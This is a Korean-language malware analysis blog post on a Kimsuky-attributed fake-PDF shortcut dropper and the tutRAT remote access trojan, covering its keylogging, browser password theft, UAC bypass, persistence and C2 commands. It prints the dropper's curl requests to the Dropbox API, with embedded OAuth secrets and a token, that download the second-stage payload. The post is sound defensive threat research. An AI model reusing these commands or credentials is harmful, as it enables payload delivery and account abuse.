얼마 전, VirusTotal에 업로드 된 트레이딩 스파르타코스 강의안-100불남(2차) 라는 이름의 악성코드를 발견하였다. 해당 악성코드는 Kimsuky 그룹에서 유포한 것으로 보여진다. 또한 해당 악성코드는 lnk 파일로 바로가기 형태를 띄는데, 피해자에게는 pdf 파일로 위장하기 위하여서 .pdf.lnk 형태의 확장자를 사용하고 있다.
* sha256: 265b69033cea7a9f8214a34cd9b17912909af46c7a47395dd7bb893a24507e59
해당 악성코드는 cmd로 바로가기 연결되어있다. 내부에는 powershell 코드를 포함하고 있어, cmd를 통해 powershell을 실행시킨다.
해당 powershell 코드는 dropbox api를 통해 로그인 및 파일을 다운로드 하는 목적으로 사용된다.
kimsuky 그룹이 소유 혹은 탈취한 dropbox 계정의 /step1 경로 아래 존재하는 ps.bin 을 다운로드한다. 이후 해당 파일을 파일리스 형태로 동작시킨다. 해당 파일은 tutRAT 라는 kimsuky 그룹이 사용하는 RAT의 한 종류이며 현재는 해당 파일은 삭제된 것으로 보여진다. 아래에서 tutRAT 에 대해 분석한다.
아래는 각 연결이다.
요청1
curl https://api.dropboxapi.com/oauth2/token -d client_id="6nyl8w1u3w4k2lz" -d client_secret="ikan154ee87osqq" -d refresh_token="h_QLZB8VqqoAAAAAAAAAASvKa1MT2U3VD-iDx_3_C_QVY1ePp0C5Ka4FUa33Eux1" -d grant_type="refresh_token"
응답1
{"access_token": "sl.BuI22M7cXe_xBzuSJVaznQ_cFJry3Ian4Xi7WcZgQC92mI225SKETUi0h8dNG_b9L_gqDo5chFHFjW7UoCrswj8zUhpeAFmcEN13WQNqaOR52D_hvJpsVQ3wIyDAVWIkKpNbOKqa83Qi", "token_type": "bearer", "expires_in": 14400}
요청2
curl -X POST https://content.dropboxapi.com/2/files/download --header "Authorization: Bearer sl.BuI22M7cXe_xBzuSJVaznQ_cFJry3Ian4Xi7WcZgQC92mI225SKETUi0h8dNG_b9L_gqDo5chFHFjW7UoCrswj8zUhpeAFmcEN13WQNqaOR52D_hvJpsVQ3wIyDAVWIkKpNbOKqa83Qi" --header "Dropbox-API-Arg: {\"path\": \"/step1/ps.bin\"}"
응답2
파일 다운로드
타 공격에서 발견된 tutRAT 를 아래에서 분석한다.
먼저 tutRAT는 .NET 형태로 작성되어있다.
실제 파일명 및 내부 클래스명이 TutClient 로 설정되어있으며 해당 이유로 tutRAT 라고 명명된 것 같다.
TutRAT는 총 5가지 행위를 수행한다.
- DDoS
- 키로거
- Password 탈취
- 데스크톱 화면 탈취
- UAC 우회
Program 함수는 메인 함수와 같은 역할이며 해당 함수에서는 위 5가지 행위와 함께 C2 서버로부터 명령을 전달받아 수행하는 등의 행위를 수행한다.
먼저, DDoS 행위의 경우 TCP, UDP, ICMP 총 3개의 프로토콜을 대상으로 수행한다. 타겟을 정하면 해당 타겟에 대해 3가지 프로토콜 중 하나로 DDoS를 수행하는 형태이다.
DDoS 에 사용하는 데이터는 단순히 "A" 문자를 패킷사이즈만큼 생성해 전송하는 형태이다.
키로거 악성행위는 피해자가 입력하는 키보드 입력 뿐 아니라 클립보드까지 탈취한다.
PasswordManager 함수에서는 브라우저에 저장된 패스워드를 탈취한다. 해당 행위는 피해자의 브라우저 내 저장된 계정과 패스워드를 탈취함으로써 향후 공격에 활용하고자 하는 목적이 있는 것으로 보여진다.
탈취 대상 브라우저는 IE와 FireFox이다.
RDesktop의 경우에는 피해자 데스크톱의 화면 및 프로그램 정보 등을 탈취해 공격자의 C2 서버로 전송하는 행위를 수행한다.
BypassUAC는 UAC 우회를 수행한다. UAC 우회에 필요한 파일들이 존재하는지를 체크하고 해당 파일들을 사용해 UAC 우회를 수행한다. 또한 해당 함수 내에 자동실행 등록도 포함되어 있으며, 레지스트리 키를 이용한 자동실행과 더불어 스케쥴 등록을 이용한 자동실행 등록도 수행한다.
메인 함수에서는 makeProbe0, makeProbe1 등의 이름을 가진 함수들이 실제 메인 악성 행위를 수행한다. 먼저 makeProbe0 함수의 경우, tutRAT 프로그램을 스케쥴 등록한다. 해당 행위로 인해 악성행위의 지속성을 꾀한다.
makeProbe1함수의 경우, 추가적인 악성코드 (해당 코드에서는 version103.vbs)를 작성 및 실행한다. version103.vbs는 C2서버로부터 다운로드 받는 추가적인 악성코드로 보여지며 C2서버로부터 추가 악성코드를 다운로드한 뒤 바로 실행하는 행위로 보여진다.
또한, 메인 클래스 안에서 C2 서버에 연결을 시도한다.
이후 C2 서버로부터 명령을 내려받고, 명령에 따라 추가적인 악성행위를 수행한다. 명령어는 "§" 문자열을 기준으로 식별된다.
아래는 각 명령에 대한 수행 행위이다.
| 명령 | 수행 행위 |
| tskmgr | Taskmgr.exe 실행 |
| fpslow | FPS를 150으로 설정 |
| fpsbest | FPS를 80으로 설정 |
| fpshigh | FPS를 50으로 설정 |
| fpsmid | FPS를 100으로 설정 |
| getinfo- | PC 명, IP 주소 등 정보 탈취 |
| msg | 메시지박스 생성 |
| freq- | 비프음 생성 |
| sound- | 시스템사운드 생성 |
| t2sl | 텍스트를 음성으로 재생 |
| cdl | CD롬 오픈/닫기 |
| emtl | task/clock/tray/desktop/start 등에 해당하는 행위 수행 |
| proclist | 프로세스 목록 전송 |
| prockill | 프로세스 삭제 |
| procstart | 프로세스 실행 |
| startcmd | cmd.exe 실행 |
| stopcmd | cmd.exe 멈춤 |
| fdrive | 드라이브 정보 전송 |
| fdir,f1 등 | fdrive가 정상 수행 되지 않았을 경우 하위 디렉토리/파일 정보 전송 |
| fup | 파일 업로드 수행 |
| fdl | 파일 다운로드 수행 |
| dc | 서버 연결 중단 |
| sklog | 키로깅 수행 |
| stklog | 태스크 로깅 수행 |
| rklog | 키로깅 내용 전송 |
| rdstart | 데스크톱 화면 녹화 등 수행 |
| rdstop | 데스크톱 화면 녹화 등 중단 |
| ddosr | 디도스 수행 |
| ddosk | 디도스 중단 |
| uacbypass | uac 우회 수행 |
| countScreens | 화면 수 정보 탈취 |
| screenNum | 현재 화면 번호 전송 |
| Registry | 레지스트리 등록 |
| Task Scheduler | 스케쥴 등록 |
| Startup Folder | 시작 폴더 등록 |
위 행위들을 명령을 통해 수행하며, 수집한 파일이나 키로깅 정보 및 브라우저 패스워드 정보 등에 대해 공격자 서버로 전송하는 것이 tutRAT의 핵심 행위이다.
'Analysis' 카테고리의 다른 글
| 67. Xworm V5.2 (0) | 2024.02.29 |
|---|---|
| 66. BianLian ransomware (0) | 2024.02.06 |
| 64. No-Justice Wiper (1) | 2024.01.09 |
| 63. Rhysida Ransomware (0.1) (1) | 2024.01.02 |
| 62. andariel's DLRAT (0) | 2023.12.19 |
